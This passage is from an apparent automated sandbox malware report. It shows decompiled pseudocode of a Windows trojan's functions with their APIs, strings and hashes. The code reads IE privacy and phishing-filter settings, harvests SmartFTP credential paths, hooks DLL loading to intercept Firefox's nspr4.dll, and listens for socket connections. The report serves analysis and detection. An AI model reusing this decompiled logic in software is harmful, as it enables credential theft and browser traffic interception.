						 *(_t48 + 0x74) =  *(_t48 + 0x74) + 1;
						_t20 = _t48 + 0x70;
						 *_t20 =  *(_t48 + 0x70) - 1;
					} while ( *_t20 != 0);
				}
				return _t22;
			}

0x00412e18
0x00412e19
0x00412e1d
0x00412e24
0x00412e36
0x00412e43
0x00412e4c
0x00412e53
0x00412e5a
0x00412e5d
0x00412e64
0x00412e69
0x00412e69
0x00412e79
0x00412e7d
0x00412e7d
0x00412e82
0x00412e85
0x00412e85
0x00412e85
0x00412e8a
0x00412e90
0x00412e9d
0x00412eb1
0x00412eb1
0x00412eb6
0x00412eba
0x00412ec1
0x00412ec8
0x00412ecf
0x00412ecf
0x00412ed5
0x00412edc
0x00412edd
0x00412ee3
0x00412ee6
0x00412eea
0x00412eed
0x00412eee
0x00412eee
0x00412f01
0x00412f08
0x00412f08
0x00412f0d
0x00412f10
0x00412f10
0x00412eee
0x00412f13
0x00412f16
0x00412f16
0x00412f16
0x00412f1d
0x00412f22

APIs

InitializeCriticalSection.KERNEL32(0041AA38), ref: 00412E36

Strings

CleanCookies, xrefs: 00412E8A, 00412E8F, 00412E9F, 00412EAF
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 00412ED5
Software\Microsoft\Internet Explorer\Privacy, xrefs: 00412E90, 00412E95, 00412EA0, 00412EB0
EnabledV8, xrefs: 00412E53
Enabled, xrefs: 00412E4C
Software\Microsoft\Internet Explorer\PhishingFilter, xrefs: 00412E64, 00412E6C, 00412E7C
1406, xrefs: 00412EBA
1609, xrefs: 00412EC1

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection
String ID: 1406$1609$CleanCookies$Enabled$EnabledV8$Software\Microsoft\Internet Explorer\PhishingFilter$Software\Microsoft\Internet Explorer\Privacy$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
API String ID: 32694325-4107750306
Opcode ID: e47ad1eb5c21e99592cd26efc98c3e4ce707b4a887cff478ca2cc4c52bb62aca
Instruction ID: d3bc6e4e3f7ff92af8898704777a4757e3176350e20910faba814a2f13eb1bf7
Opcode Fuzzy Hash: e47ad1eb5c21e99592cd26efc98c3e4ce707b4a887cff478ca2cc4c52bb62aca
Instruction Fuzzy Hash: 332152725053086AEB209F62DE09BDF37A8EF41354F24443BFD04B61D2D3B89965CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040926B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158
memorysynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040926B(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t37;
				void* _t39;
				void* _t42;
				void* _t45;
				void* _t52;
				void* _t57;
				void* _t62;
				void* _t70;
				WCHAR* _t74;
				void* _t75;
				void* _t79;
				void* _t80;

				_t70 = __edx;
				_t64 = __ecx;
				_t22 = E00407A11(__ecx, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E00407B3F();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E0040DD1D(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x419798, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E00413D6A(_t64);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t62 = E00410520( &_v16, _t70, __eflags, _t28, 2, 0x20000000);
						_v20 = _t62;
						__eflags = _t62;
						if(__eflags == 0) {
							L21:
							E004097F7(_v20);
							E004097F7(_v24);
							goto L22;
						}
						_t64 = _v16;
						_t33 = E00408FA7(_v16, __eflags, _t62);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E0040A6CE(_t62, 1);
							_v12 = E0040A6CE(_t62, 2);
							_t37 = E0040B855(_t62, E0040A398(_t62));
							_t68 = _v8;
							_t39 = E0040B855(_t68, E0040A398(_v8));
							_t69 = _v12;
							_push(E0040B855(_t69, E0040A398(_v12)));
							_push(_t39);
							_push(_t37);
							_push(L"Global\\%08X%08X%08X");
							_t70 = 0x20;
							_t74 =  &_v92;
							_t42 = E0040A4B7(_t41, _t70, _t74);
							_t80 = _t80 + 0x10;
							__eflags = _t42 - 0x1f;
							if(_t42 != 0x1f) {
								goto L20;
							}
							_t45 = CreateMutexW(0x41930c, 1, _t74);
							__eflags = _t45;
							if(_t45 == 0) {
								_t79 = 0;
								__eflags = 0;
							} else {
								_t79 = E0040DD2D(_t45);
							}
							__eflags = _t79;
							if(_t79 != 0) {
								_t75 = HeapAlloc( *0x41a570, 8, 0x14);
								__eflags = _t75;
								if(_t75 == 0) {
									L19:
									E0040DD1D(_t79);
									goto L20;
								}
								 *_t75 = E00409B94(_t46 | 0xffffffff, _t62);
								 *(_t75 + 4) = E00409B94(_t48 | 0xffffffff, _v8);
								_t52 = E00409B94(_t50 | 0xffffffff, _v12);
								__eflags =  *_t75;
								 *(_t75 + 8) = _t52;
								 *(_t75 + 0xc) = _t79;
								if( *_t75 == 0) {
									L18:
									E004097F7( *_t75);
									E004097F7( *(_t75 + 4));
									E004097F7( *(_t75 + 8));
									E004097F7(_t75);
									goto L19;
								}
								__eflags =  *(_t75 + 4);
								if( *(_t75 + 4) == 0) {
									goto L18;
								}
								__eflags = _t52;
								if(_t52 == 0) {
									goto L18;
								}
								_t57 = E0040F70A(0x80000, E004090AC, _t75);
								__eflags = _t57;
								if(_t57 > 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t64 = _t62;
							_t62 = E0040A6CE(_t62, 3);
							__eflags = _t62;
						} while (_t62 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x419798, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

0x0040926b
0x0040926b
0x00409278
0x0040927d
0x00409282
0x00409293
0x00409299
0x0040929e
0x004092a0
0x00409459
0x0040945c
0x00409461
0x00000000
0x00409461
0x004092b1
0x004092b7
0x004092bc
0x00000000
0x00000000
0x004092c5
0x004092c5
0x004092ca
0x004092cd
0x004092cf
0x00000000
0x00000000
0x004092e5
0x004092e7
0x004092ea
0x004092ec
0x0040942a
0x0040942d
0x00409435
0x00000000
0x00409435
0x004092f2
0x004092f6
0x004092fb
0x004092fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00409303
0x00409303
0x00409310
0x0040931a
0x00409324
0x00409329
0x00409335
0x0040933a
0x0040934b
0x0040934c
0x0040934d
0x0040934e
0x00409355
0x00409356
0x00409359
0x0040935e
0x00409361
0x00409364
0x00000000
0x00000000
0x00409374
0x0040937a
0x0040937c
0x00409387
0x00409387
0x0040937e
0x00409383
0x00409383
0x00409389
0x0040938b
0x004093a1
0x004093a3
0x004093a5
0x00409411
0x00409412
0x00000000
0x00409412
0x004093b3
0x004093c0
0x004093c6
0x004093cb
0x004093ce
0x004093d1
0x004093d4
0x004093f4
0x004093f6
0x004093fe
0x00409406
0x0040940c
0x00000000
0x0040940c
0x004093d6
0x004093da
0x00000000
0x00000000
0x004093dc
0x004093de
0x00000000
0x00000000
0x004093eb
0x004093f0
0x004093f2
0x00000000
0x00000000
0x00000000
0x004093f2
0x00409417
0x00409419
0x00409420
0x00409422
0x00409422
0x00000000
0x0040943a
0x00409445
0x0040944b
0x0040944b
0x00000000
0x00409458
0x00000000

APIs

Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32

GetCurrentThread.KERNEL32 ref: 0040928C
SetThreadPriority.KERNEL32(00000000), ref: 00409293
WaitForSingleObject.KERNEL32(0000EA60), ref: 004092B1
CreateMutexW.KERNEL32(0041930C,00000001,?,20000000), ref: 00409374
HeapAlloc.KERNEL32(00000008,00000014), ref: 0040939B

Strings

Global\%08X%08X%08X, xrefs: 0040934E

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CreateMutexThread$AllocCurrentHeapObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 1505615485-3239447729
Opcode ID: 53148d1c98e7002fb7277b3481fb64a50876eb2f5bf37401b559759476b61ff8
Instruction ID: f99632d8d91a63277727bfec5330b48c91110177e8c9455d41db4f9cc3ae37aa
Opcode Fuzzy Hash: 53148d1c98e7002fb7277b3481fb64a50876eb2f5bf37401b559759476b61ff8
Instruction Fuzzy Hash: 1841B071A00301B6DB107FB28C8ABAF766AAF44714F10453BF951B62E3DF7D8C518A69

Uniqueness

Uniqueness Score: -1.00%

Function 00407219, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407219(void* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v532;
				short _v1052;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t16;
				void* _t32;
				WCHAR* _t34;
				WCHAR* _t35;

				_t32 = __edx;
				E004098AA( &_v12,  &_v12, 0, 8);
				_t34 =  &_v532;
				_t15 = E0040ED7B(0x104, _t34, 0x80000001, L"SOFTWARE\\smartftp\\client 2.0\\settings\\general\\favorites", L"personal favorites");
				if(_t15 != 0xffffffff && _t15 > 0) {
					ExpandEnvironmentStringsW(_t34,  &_v1052, 0x104);
					E00406F9D( &_v1052,  &_v12);
				}
				_t35 =  &_v532;
				_t16 = E0040ED7B(0x104, _t35, 0x80000001, L"SOFTWARE\\smartftp\\client 2.0\\settings\\backup", L"folder");
				if(_t16 != 0xffffffff && _t16 > 0) {
					ExpandEnvironmentStringsW(_t35,  &_v1052, 0x104);
					_t16 = E00406F9D( &_v1052,  &_v12);
				}
				_t41 = _v8;
				if(_v8 > 0) {
					E00412508(_t16, _v12, _t32, _t41, L"SmartFTP");
				}
				return E004097F7(_v12);
			}

0x00407219
0x0040722d
0x00407247
0x0040724d
0x00407255
0x00407266
0x00407276
0x00407276
0x00407286
0x0040728c
0x00407294
0x004072a5
0x004072b5
0x004072b5
0x004072ba
0x004072be
0x004072c8
0x004072c8
0x004072d9

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\smartftp\client 2.0\settings\general\favorites,personal favorites,?,00000000,00000008), ref: 00407266
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\smartftp\client 2.0\settings\backup,folder,80000001,SOFTWARE\smartftp\client 2.0\settings\general\favorites,personal favorites,?,00000000,00000008), ref: 004072A5

Strings

folder, xrefs: 0040727B
SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00407237
personal favorites, xrefs: 00407232
SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00407280
SmartFTP, xrefs: 004072C3

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$SmartFTP$folder$personal favorites
API String ID: 237503144-2826361158
Opcode ID: 8f68b3936625bcc1834525d7a8d200a2e019c488f776878786ecb5cfe990f983
Instruction ID: 31394ff3ad001db7313ea6a7fbe22de9aa86fe32beee15327d4f061efbd570aa
Opcode Fuzzy Hash: 8f68b3936625bcc1834525d7a8d200a2e019c488f776878786ecb5cfe990f983
Instruction Fuzzy Hash: 0011B271A4010C7ACB20AAA5CC85FCF767CAF04714F1005BBB615F31D1DA786AC58AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403615, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403615(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				void* __edi;
				void* _t13;
				long _t14;
				void* _t17;
				void* _t18;
				void* _t22;
				void* _t23;
				void* _t24;
				UNICODE_STRING* _t25;
				void* _t29;
				HMODULE* _t30;
				struct _OBJDIR_INFORMATION _t32;

				E00407B30();
				if(E00407B3F() != 0) {
					_t30 = _a16;
					_t25 = _a12;
					_t13 =  *0x419308(_a4, 0, _t25, _t30, _t24, _t29, _t18);
					_t14 = LdrLoadDll(_a4, _a8, _t25, _t30);
					_a4 = _t14;
					if(_t13 < 0 && _t14 >= 0 && _t30 != 0 &&  *_t30 != 0 && _t25 != 0) {
						EnterCriticalSection(0x419188);
						if(( *0x4191a0 & 0x00000001) == 0) {
							_t32 =  *_t30;
							if(lstrcmpiW( *(_t25 + 4), L"nspr4.dll") != 0) {
								_t17 = 0;
							} else {
								_t17 = E00404DB1(_t22, _t23, _t32);
							}
							if(_t17 != 0) {
								 *0x4191a0 =  *0x4191a0 | 0x00000001;
							}
						}
						LeaveCriticalSection(0x419188);
					}
					return _a4;
				}
				goto ( *0x419304);
			}

0x00403618
0x00403624
0x0040362f
0x00403633
0x0040363d
0x0040364d
0x00403653
0x00403658
0x00403671
0x0040367e
0x00403683
0x00403693
0x0040369e
0x00403695
0x00403697
0x00403697
0x004036a2
0x004036a4
0x004036a4
0x004036a2
0x004036ac
0x004036ac
0x004036b9
0x004036b9
0x00403627

APIs

Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38

Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0040363D
LdrLoadDll.NTDLL(?,?,?,?), ref: 0040364D
EnterCriticalSection.KERNEL32(00419188), ref: 00403671
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0040368B
LeaveCriticalSection.KERNEL32(00419188), ref: 004036AC

Strings

@xw, xrefs: 00403627, 0040364D
nspr4.dll, xrefs: 00403685

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalObjectSectionSingleWait$EnterHandleLeaveLoadlstrcmpi
String ID: @xw$nspr4.dll
API String ID: 535701974-1669710511
Opcode ID: e958c34da4d3ad7947392385f9e0a547d5d3dc5dcb466b0fe9d4daec3a24187f
Instruction ID: 68fc0d21d15f602f6fd9813450dd037956c2be53508a7386fdd631dfb32fcecd
Opcode Fuzzy Hash: e958c34da4d3ad7947392385f9e0a547d5d3dc5dcb466b0fe9d4daec3a24187f
Instruction Fuzzy Hash: EB11B231100205BBDB205F519D68A9B3FACEF85756F04487AFD05773A1C73A9E81CA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F88A, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040F88A(void* _a4, WCHAR* _a8) {
				char _v524;
				void* __edi;
				void* __esi;
				void** _t8;
				void* _t13;
				void* _t18;
				WCHAR* _t24;
				WCHAR* _t30;

				_t8 =  &_a4;
				_push(_t8);
				_push(_a4);
				_t18 = 0;
				L00415956();
				if(_t8 != 0) {
					_push(_a4);
					_t24 =  &_v524;
					if(E0040A4B7(_t8, 0x104, _t24, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\%s") > 0) {
						_t30 = _t24;
						_t13 = E0040ED7B(0x104, _t30, 0x80000002, _t24, L"ProfileImagePath");
						if(_t13 != 0 && _t13 != 0xffffffff) {
							PathUnquoteSpacesW(_t30);
							ExpandEnvironmentStringsW(_t30, _a8, 0x104);
							asm("sbb bl, bl");
							_t18 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t18;
			}

0x0040f894
0x0040f897
0x0040f898
0x0040f89b
0x0040f89d
0x0040f8a4
0x0040f8a8
0x0040f8b7
0x0040f8c6
0x0040f8d7
0x0040f8d9
0x0040f8e0
0x0040f8ea
0x0040f8f7
0x0040f903
0x0040f905
0x0040f905
0x0040f8e0
0x0040f90a
0x0040f911
0x0040f916

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0040F89D
PathUnquoteSpacesW.SHLWAPI(?,80000002,?,ProfileImagePath,.exe,00000000,00000000), ref: 0040F8EA
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 0040F8F7
LocalFree.KERNEL32(?,.exe,00000000,00000000), ref: 0040F90A

Strings

.exe, xrefs: 0040F8A7
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s, xrefs: 0040F8B0
ProfileImagePath, xrefs: 0040F8CA

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: ConvertEnvironmentExpandFreeLocalPathSpacesStringStringsUnquote
String ID: .exe$ProfileImagePath$SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
API String ID: 1452230276-4100006056
Opcode ID: df0a2b4d316724797dba8bfe24f87b7a89b574f8b18fab32434f215cfaf68c8d
Instruction ID: 4a3e77216fc57d26c38a6f801ce880884a188e00e35209db20c52cd4a7b06c5b
Opcode Fuzzy Hash: df0a2b4d316724797dba8bfe24f87b7a89b574f8b18fab32434f215cfaf68c8d
Instruction Fuzzy Hash: 4C012EB22002047BCB202A66DD08E8B3E58DB80370B000233BC54F72E0DB78D958C698

Uniqueness

Uniqueness Score: -1.00%

Function 0041415B, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041415B(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x41ac54 =  *0x41ac54 & 0x00000000;
				 *0x41ac58 =  *0x41ac58 & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x41ac38);
				 *0x41ac50 = _a4;
				 *0x41ac2c = _a8;
				 *0x41ac5c = _a12;
				 *0x41ac30 = _t14;
				 *0x41ac28 = _a16;
				 *0x41ac24 = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x41ac34 = GetProcAddress( *0x41ac30, "PR_SetError");
				_t12 = GetProcAddress( *0x41ac30, "PR_GetError");
				 *0x41ab54 = _t12;
				return _t12;
			}

0x0041415b
0x00414162
0x0041416f
0x00414171
0x0041417b
0x00414184
0x00414192
0x0041419b
0x004141a8
0x004141ba
0x004141cc
0x004141d1
0x004141d3
0x004141d9

APIs

InitializeCriticalSection.KERNEL32(0041AC38,74B04EE0,00404E2D,00419140,00000000,?,00000000,00407783,?,00000000), ref: 00414171
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 004141AD
GetProcAddress.KERNEL32(PR_SetError), ref: 004141BF
GetProcAddress.KERNEL32(PR_GetError), ref: 004141D1

Strings

PR_GetNameForIdentity, xrefs: 0041418D
PR_SetError, xrefs: 004141AF
PR_GetError, xrefs: 004141C1

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 6d94cf3b99f3e6987cc50b6a1c9a114de759b8df395e83fe97acb6e68dd810cd
Instruction ID: 5ec90880f5ed00e410c12ff35b169b57a65e5ff92478b4a826f33af8613d71d6
Opcode Fuzzy Hash: 6d94cf3b99f3e6987cc50b6a1c9a114de759b8df395e83fe97acb6e68dd810cd
Instruction Fuzzy Hash: DC01A475A463549FC711CF64EE48A867FE0FB08365B10883BF404A32A1EBB854609FCA

Uniqueness

Uniqueness Score: -1.00%

Function 00411226, Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00411226(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				intOrPtr _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				void* _t49;
				void* _t55;
				void* _t56;
				void* _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				void* _t72;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E00407A11(__ecx, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					if(E00407B3F() == 0) {
						L26:
						E0040DD1D(_v148);
						_t49 = 0;
						L27:
						return _t49;
					}
					E00413EC0(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E004110DC( &_v160, _v78,  &_v168) & 0x0000ffff;
					if(_t94 != 0) {
						L7:
						if(_t94 != _v74) {
							E00413F57( &_v124);
							_v78 = _t94;
							E00413FAF( &_v128);
						}
						_t55 =  *0x419798; // 0x12c
						_v144 = _t55;
						_t56 = _v152;
						_v172 = 1;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						if(_t57 != 0) {
							_t87 = _v172;
							_v172 = _v172 + 1;
							 *((intOrPtr*)(_t100 + 0x2c + _v172 * 4)) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						if(_t59 <= 0) {
							L25:
							E0040CBD4(_t59, _v156);
							E0040CBD4(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(_t59 < _v172) {
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								if(_t64 != _v152) {
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E0040CC2C(_t87, _t97);
											if(E0040F70A(0x20000, E00411159, _t97) == 0) {
												E0040CBD4(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					}
					while(WaitForSingleObject( *0x419798, 0x3e8) == 0x102) {
						_t87 = _v74;
						_t94 = E004110DC( &_v156, _v74,  &_v164) & 0x0000ffff;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x0041122c
0x00411237
0x0041123e
0x00411245
0x0041124b
0x0041125c
0x004113f4
0x004113f8
0x004113fd
0x004113ff
0x00411405
0x00411405
0x00411267
0x0041126c
0x0041127e
0x00411284
0x004112c1
0x004112c6
0x004112cd
0x004112d7
0x004112dc
0x004112dc
0x004112e1
0x004112e6
0x004112ea
0x004112ee
0x004112f8
0x004112fa
0x004112fe
0x004112fe
0x00411302
0x00411308
0x0041130a
0x0041130e
0x00411312
0x00411312
0x00411322
0x0041132a
0x004113d0
0x004113d4
0x004113e9
0x004113f2
0x00000000
0x00411330
0x00411330
0x00411336
0x00411340
0x00411348
0x00411354
0x004113a8
0x004113a8
0x004113ae
0x004113b0
0x004113b5
0x00000000
0x00000000
0x00411363
0x0041137f
0x00411383
0x0041138a
0x004113a1
0x004113a3
0x004113a3
0x004113a1
0x004113c2
0x004113ca
0x00000000
0x00000000
0x00000000
0x004113ca
0x00411356
0x0041135a
0x0041135a
0x00000000
0x0041135a
0x0041134a
0x00000000
0x0041134a
0x00000000
0x00411336
0x0041132a
0x00411286
0x0041129e
0x004112b0
0x004112b6
0x00000000
0x00000000
0x00000000
0x004112b6
0x004112bb
0x00000000
0x00000000
0x00000000
0x004112bb
0x0041124f
0x00000000

APIs

Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32

WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 00411291
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 00411322
accept.WS2_32(?,00000000,00000000), ref: 004113AE
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 004113C2
CloseHandle.KERNEL32(?), ref: 004113E3
CloseHandle.KERNEL32(?), ref: 004113F2

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
String ID:
API String ID: 38240579-0
Opcode ID: 80098c103e0d020010c3c53ca27bf8201dfd7e2c32820faa17c90fa6cd5b0338
Instruction ID: 78bb88af478c80c03581daf2a3abdac406f8bc5f6239fc56277288a4d92166c3
Opcode Fuzzy Hash: 80098c103e0d020010c3c53ca27bf8201dfd7e2c32820faa17c90fa6cd5b0338
Instruction Fuzzy Hash: B9516C71508304AFD710EF65D884CAFB7E9EBC5714F200A2EFAA5E31A0D7349D858B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00413BF3, Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413BF3() {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _v580;
				void* _v588;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t56;
				intOrPtr* _t57;
				void** _t59;
				void** _t60;
				void** _t62;
				long _t65;
				int _t71;
				void** _t72;
				void* _t73;

				_t71 = 0;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t71);
					_v20 = _t42;
					_v24 = _t71;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v588;
						_v588 = 0x22c;
						Process32FirstW(_v20, _t45);
					}
					while(_t45 != 0) {
						_t65 = _v580;
						__eflags = _t65 - _t71;
						if(_t65 <= _t71) {
							L20:
							_t45 = Process32NextW(_v20,  &_v588);
							continue;
						}
						__eflags = _t65 -  *0x419544; // 0xff0
						if(__eflags == 0) {
							goto L20;
						}
						_t47 = 0;
						__eflags = _v12 - _t71;
						if(_v12 <= _t71) {
							L8:
							_t48 = E0040797B(_t65, _t70, _t65);
							_v28 = _t48;
							__eflags = _t48 - _t71;
							if(_t48 == _t71) {
								goto L20;
							}
							_t73 = OpenProcess(0x400, _t71, _v580);
							__eflags = _t73 - _t71;
							if(_t73 == _t71) {
								L19:
								CloseHandle(_v28);
								goto L20;
							}
